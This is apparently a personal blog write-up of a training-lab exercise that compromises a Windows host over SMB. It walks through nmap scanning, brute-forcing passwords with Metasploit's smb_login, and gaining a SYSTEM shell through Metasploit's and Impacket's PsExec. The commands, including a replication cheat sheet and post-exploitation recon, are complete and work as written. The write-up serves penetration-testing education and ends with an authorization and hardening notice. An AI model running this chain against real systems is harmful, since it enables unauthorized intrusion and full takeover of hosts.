RS
Raj Sheth

Exploiting SMB using PsExec

Abusing SMB authentication to execute remote commands via PsExec. Demonstrates a complete attack chain from recon to foothold.

Tools/Skills:
SMB
Pentesting
Windows
MSF
Posted on November 18, 2025

SMB Exploitation — demo.ine.local

Objective

Fingerprint SMB (port 445), discover valid credentials, exploit the service using Metasploit or Impacket’s PsExec, and retrieve the flag.

SMB Overview

SMB (Server Message Block)

  • Protocol for file, printer, and inter-process sharing over TCP (usually ports 445 and 139).

  • Commonly used in Windows domains.

  • Exposes authentication and remote procedure calls (RPC).

  • Vulnerabilities: weak authentication, null sessions, SMB signing not required, or code-execution vectors (e.g., EternalBlue, PsExec abuse).

PsExec concept

  • Windows Sysinternals utility allowing remote code execution via SMB.

  • Works by:

    1. Uploading a service binary to ADMIN$ or another writable share.

    2. Creating and starting a service using Service Control Manager RPC.

    3. Running commands as SYSTEM.

  • Impacket implements this behavior in psexec.py for remote shells or payload staging.

Fingerprinting Phase

Nmap Scan

nmap demo.ine.local

Result → multiple ports open including 445/tcp microsoft-ds.

SMB Protocol Check

nmap -p445 --script smb-protocols demo.ine.local

→ Lists supported SMB versions and dialects (e.g., SMBv2 / SMBv3).

Credential Discovery

Metasploit smb_login module

msfconsole -q use auxiliary/scanner/smb/smb_login set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt set RHOSTS demo.ine.local set VERBOSE false exploit

→ Found valid credentials for 4 users (e.g., Administrator:qwertyuiop).

Exploitation with Metasploit

PsExec module

use exploit/windows/smb/psexec set RHOSTS demo.ine.local set SMBUser Administrator set SMBPass qwertyuiop exploit

Outcome:

  • Reverse Meterpreter session opened.

  • Privilege: NT AUTHORITY\SYSTEM.

  • Flag retrieved:

C:\> type flag.txt e0da81a9cd42b261bc9b90d15f780433

Manual Exploitation — Impacket PsExec

Confirm availability

python3 /usr/share/doc/python3-impacket/examples/psexec.py -h

Run manually

python3 /usr/share/doc/python3-impacket/examples/psexec.py Administrator@10.2.21.62 cmd.exe

When prompted, enter the discovered password.

Execution flow:

  • Connects to SMB on target.

  • Uploads random binary (e.g., hbGtcJNF.exe).

  • Creates and starts a service.

  • Launches an interactive CMD shell.

Session evidence:

Microsoft Windows [Version 10.0.14393] C:\Windows\system32> whoami nt authority\system

Notes on the SyntaxError

Running /usr/share/doc/python3-impacket/examples/psexec.py directly without python3 caused Python 2 syntax interpretation and error:

SyntaxError: invalid syntax

Fix → always run with python3.

Post-exploitation checks

From Meterpreter or PsExec shell:

whoami systeminfo ipconfig net user

Use these to confirm privileges, OS, and possible lateral-movement targets.

Key Points

  • SMB 445 is critical for remote administration; limit exposure.

  • Weak or reused passwords enable PsExec-style compromise.

  • Metasploit’s exploit/windows/smb/psexec automates the same process as Impacket’s psexec.py.

  • Always verify nt authority\system after exploitation.

  • Clean up uploaded binaries and temporary services when finished.

Replication Quick Sheet

# Discovery nmap -p445 --script smb-protocols demo.ine.local # Brute-force use auxiliary/scanner/smb/smb_login set USER_FILE common_users.txt set PASS_FILE unix_passwords.txt set RHOSTS demo.ine.local run # Exploit use exploit/windows/smb/psexec set SMBUser Administrator set SMBPass qwertyuiop set RHOSTS demo.ine.local run

Ethical Notice

Only perform SMB exploitation within authorized lab environments.
Disable SMBv1 and enforce strong passwords in production systems.